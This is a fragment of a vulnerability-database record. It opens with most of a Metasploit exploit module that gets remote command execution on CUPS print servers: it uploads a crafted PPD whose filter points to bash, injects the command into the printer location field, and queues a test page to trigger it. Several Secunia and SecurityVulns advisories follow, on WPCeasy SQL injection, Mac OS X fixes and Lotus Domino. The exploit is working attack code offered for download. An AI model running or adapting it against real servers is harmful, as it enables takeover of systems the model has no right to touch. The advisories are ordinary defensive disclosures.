end\r\n\r\n # Add a printer containing the payload\r\n # with a CUPS filter pointing to /bin/bash\r\n res = add_printer(printer_name, cmd)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not add printer - Connection failed.\")\r\n elsif res.body =~ /Set Default Options for #{printer_name}/\r\n print_good(\"#{peer} - Added printer successfully\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add printer - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add printer - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could not add printer.\")\r\n end\r\n\r\n # Add a test page to the print queue.\r\n # The print job triggers execution of the bash filter\r\n # which executes the payload in the environment variables.\r\n res = print_test_page(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not add test page to print queue - Connection failed.\")\r\n elsif res.body =~ /Test page sent; job ID is/\r\n vprint_good(\"#{peer} - Added test page to printer queue\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add test page to print queue - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add test page to print queue - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could not add test page to print queue.\")\r\n end\r\n\r\n # Delete the printer\r\n res = delete_printer(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not delete printer - Connection failed.\")\r\n elsif res.body =~ /has been deleted successfully/\r\n print_status(\"#{peer} - Deleted printer '#{printer_name}' successfully\")\r\n elsif res.code == 401 || (res.code == 426 && 
datastore['SSL'] == true)\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.\")\r\n elsif res.code == 426\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.\")\r\n else\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}'\")\r\n end\r\n end\r\n\r\n #\r\n # Add a printer to CUPS\r\n #\r\n def add_printer(printer_name, cmd)\r\n vprint_status(\"#{peer} - Adding new printer '#{printer_name}'\")\r\n\r\n ppd_name = \"#{rand_text_alphanumeric(10 + rand(5))}.ppd\"\r\n ppd_file = <<-EOF\r\n*PPD-Adobe: \"4.3\"\r\n*%==== General Information Keywords ========================\r\n*FormatVersion: \"4.3\"\r\n*FileVersion: \"1.00\"\r\n*LanguageVersion: English\r\n*LanguageEncoding: ISOLatin1\r\n*PCFileName: \"#{ppd_name}\"\r\n*Manufacturer: \"Brother\"\r\n*Product: \"(Brother MFC-3820CN)\"\r\n*1284DeviceID: \"MFG:Brother;MDL:MFC-3820CN\"\r\n*cupsVersion: 1.1\r\n*cupsManualCopies: False\r\n*cupsFilter: \"application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash\"\r\n*cupsModelNumber: #{rand(10) + 1}\r\n*ModelName: \"Brother MFC-3820CN\"\r\n*ShortNickName: \"Brother MFC-3820CN\"\r\n*NickName: \"Brother MFC-3820CN CUPS v1.1\"\r\n*%\r\n*%==== Basic Device Capabilities =============\r\n*LanguageLevel: \"3\"\r\n*ColorDevice: True\r\n*DefaultColorSpace: RGB\r\n*FileSystem: False\r\n*Throughput: \"12\"\r\n*LandscapeOrientation: Plus90\r\n*VariablePaperSize: False\r\n*TTRasterizer: Type42\r\n*FreeVM: \"1700000\"\r\n\r\n*DefaultOutputOrder: Reverse\r\n*%==== Media Selection ======================\r\n\r\n*OpenUI *PageSize/Media Size: PickOne\r\n*OrderDependency: 18 AnySetup *PageSize\r\n*DefaultPageSize: BrLetter\r\n*PageSize BrA4/A4: \"<</PageSize[595 842]/ImagingBBox null>>setpagedevice\"\r\n*PageSize BrLetter/Letter: \"<</PageSize[612 792]/ImagingBBox null>>setpagedevice\"\r\nEOF\r\n\r\n pd = Rex::MIME::Message.new\r\n pd.add_part(ppd_file, 
'application/octet-stream', nil, %(form-data; name=\"PPD_FILE\"; filename=\"#{ppd_name}\"))\r\n pd.add_part(\"#{@cookie}\", nil, nil, %(form-data; name=\"org.cups.sid\"))\r\n pd.add_part(\"add-printer\", nil, nil, %(form-data; name=\"OP\"))\r\n pd.add_part(\"#{printer_name}\", nil, nil, %(form-data; name=\"PRINTER_NAME\"))\r\n pd.add_part(\"\", nil, nil, %(form-data; name=\"PRINTER_INFO\")) # injectable\r\n pd.add_part(\"#{cmd}\", nil, nil, %(form-data; name=\"PRINTER_LOCATION\")) # injectable\r\n pd.add_part(\"file:///dev/null\", nil, nil, %(form-data; name=\"DEVICE_URI\"))\r\n\r\n data = pd.to_s\r\n data.strip!\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'ctype' => \"multipart/form-data; boundary=#{pd.bound}\",\r\n 'data' => data,\r\n 'cookie' => \"org.cups.sid=#{@cookie};\",\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\r\n )\r\n end\r\n\r\n #\r\n # Queue a printer test page\r\n #\r\n def print_test_page(printer_name)\r\n vprint_status(\"#{peer} - Adding test page to printer queue\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'printers', printer_name),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'print-test-page'\r\n }\r\n )\r\n end\r\n\r\n #\r\n # Delete a printer\r\n #\r\n def delete_printer(printer_name)\r\n vprint_status(\"#{peer} - Deleting printer '#{printer_name}'\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'delete-printer',\r\n 'printer_name' => printer_name,\r\n 'confirm' => 'Delete Printer'\r\n }\r\n )\r\n end\r\n\r\nend", 
"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35115/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "description": "User-supplied network file is used for stored user's credentials during TCP/2050 service authentication.", "modified": "2011-03-23T00:00:00", "published": "2011-03-23T00:00:00", "id": "SECURITYVULNS:VULN:11514", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11514", "title": "IBM Lotus Domino Server Controller unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-02-20T00:00:00", "published": "2006-02-20T00:00:00", "id": "SECURITYVULNS:VULN:5799", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5799", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nWPCeasy Admin Logon SQL Injection Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA18945\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/18945/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nManipulation of data\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nWPCeasy\r\nhttp://secunia.com/product/8156/\r\n\r\nDESCRIPTION:\r\nmurfie has reported a vulnerability in WPCeasy, which can be\r\nexploited by malicious people to conduct SQL injection attacks.\r\n\r\nInput passed to the "uid" and "pwd" parameters in admin.asp isn't\r\nproperly sanitised before being used in a SQL query. 
This can be\r\nexploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nSuccessful exploitation allows bypassing of authentication to the\r\nadmin page.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly sanitised.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nmurfie\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-02-20T00:00:00", "published": "2006-02-20T00:00:00", "id": "SECURITYVULNS:DOC:11514", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11514", "title": "[SA18945] WPCeasy Admin Logon SQL Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nMac OS X Security Update Fixes Multiple Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA12491\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/12491/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nSecurity Bypass, Cross Site Scripting, Manipulation of data, Exposure\r\nof system information, Exposure of sensitive information, Privilege\r\nescalation, DoS, System access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nOPERATING SYSTEM:\r\nApple Macintosh OS X\r\nhttp://secunia.com/product/96/\r\n\r\nSOFTWARE:\r\nSafari 
1.x\r\nhttp://secunia.com/product/1543/\r\n\r\nDESCRIPTION:\r\nApple has issued a security update for Mac OS X, which fixes various\r\nvulnerabilities.\r\n\r\n1) Two vulnerabilities in mod_ssl and apache can potentially can be\r\nexploited by malicious people to cause a DoS (Denial of Service) or\r\ncompromise a vulnerable system.\r\n\r\nFor more information:\r\nSA11534\r\nSA11956\r\n\r\nThese vulnerabilities affect Server versions only.\r\n\r\n2) A vulnerability within the CoreFoundation may result in a\r\nprivileged program loading a user supplied library. The problem is\r\nreportedly that bundles using the CFPlugIn facilities can include\r\ndirections to automatically load plugin executables.\r\n\r\nSuccessful exploitation allows a malicious, local users to gain\r\nescalated privileges.\r\n\r\n3) A vulnerability within the CoreFoundation can be exploited by\r\nmalicious, local users to gain escalated privileges.\r\n\r\nThe vulnerability is caused due to a boundary error within the\r\nhandling of an environment variable. This may cause a buffer overflow\r\nand allow execution of arbitrary code with the privileges of a\r\nprivileged program.\r\n\r\n4) A vulnerability in the IPsec implementation can potentially be\r\nexploited by malicious people to bypass certain security\r\nrestrictions.\r\n\r\nFor more information:\r\nSA11863\r\n\r\n5) Vulnerabilities in Kerberos can be exploited by malicious users to\r\ncompromise a vulnerable system.\r\n\r\nFor more information:\r\nSA11753\r\n\r\n6) Vulnerabilities in lukemftpd can potentially be exploited by\r\nmalicious users to gain escalated privileges or compromise a\r\nvulnerable system.\r\n\r\nFor more information:\r\nSA12226\r\n\r\n7) A vulnerability in OpenLDAP may reportedly allow a crypt password\r\nto be used as if it was a plain text password. 
The vulnerability is\r\ncaused due to an error within the backwards compatibility with older\r\nLDAP implementations, which allows a crypt password to be stored in\r\nthe "userPassword" attribute.\r\n\r\nThis vulnerability does not affect version 10.2.8.\r\n\r\n8) An older vulnerability in OpenSSH can potentially be exploited by\r\nmalicious people to overwrite arbitrary files.\r\n\r\nThe vulnerability is caused due to missing validation in the scp\r\nutility when handling filenames. This can be exploited by a malicious\r\nSSH server to overwrite an arbitrary file with the privileges of the\r\nuser via a directory traversal attack.\r\n\r\n9) A vulnerability in the PPPDialer can be exploited by malicious,\r\nlocal users to overwrite certain system files.\r\n\r\nThe vulnerability is caused due to the PPP components accessing a\r\nfile stored in a world-writable location insecurely. \r\n\r\n10) A vulnerability in the QuickTime Streaming Server can be\r\nexploited by malicious people to cause a DoS (Denial of Service) via\r\na particular sequence of client operations.\r\n\r\nThis vulnerability affects Server versions only.\r\n\r\n11) A vulnerability in rsync can be exploited by malicious people to\r\nwrite files outside the intended directory.\r\n\r\nFor more information:\r\nSA11514\r\n\r\n12) A vulnerability in Safari can be exploited by malicious people to\r\nspoof the content of websites.\r\n\r\nFor more information:\r\nSA11978\r\n\r\n13) Vulnerabilities in SquirrelMail can be exploited by malicious\r\npeople to conduct cross-site scripting and SQL injection attacks.\r\n\r\nFor more information:\r\nSA11685\r\n\r\n14) Two vulnerabilities in tcpdump can be exploited by malicious\r\npeople to cause a DoS (Denial of Service).\r\n\r\nFor more information:\r\nSA11258\r\n\r\nSOLUTION:\r\nApply Security Update 2004-09-07.\r\n\r\nMac OS X 10.3.5:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_3_5_Client).html\r\n\r\nMac OS X Server 
10.3.5:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_3_5_Server).html\r\n\r\nMac OS X 10.3.4:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07(10_3_4_Client).html\r\n\r\nMac OS X Server 10.3.4:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_3_4_Server).html\r\n\r\nMac OS X 10.2.8:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_2_8_Client).html\r\n\r\nMac OS X Server 10.2.8:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_2_8_Server).html\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\n2) Kikuchi Masashi\r\n3) Aaron\r\n7) Steve Revilak\r\n\r\nOTHER REFERENCES:\r\nSA11258:\r\nhttp://secunia.com/advisories/11258/\r\n\r\nSA11514:\r\nhttp://secunia.com/advisories/11514/\r\n\r\nSA11534:\r\nhttp://secunia.com/advisories/11534/\r\n\r\nSA11685:\r\nhttp://secunia.com/advisories/11685/\r\n\r\nSA11753:\r\nhttp://secunia.com/advisories/11753/\r\n\r\nSA11863:\r\nhttp://secunia.com/advisories/11863/\r\n\r\nSA11956:\r\nhttp://secunia.com/advisories/11956/\r\n\r\nSA11978:\r\nhttp://secunia.com/advisories/11978/\r\n\r\nSA12226:\r\nhttp://secunia.com/advisories/12226/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2004-09-08T00:00:00", "published": "2004-09-08T00:00:00", "id": "SECURITYVULNS:DOC:6773", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:DOC:6773", "title": "[SA12491] Mac OS X Security Update Fixes Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}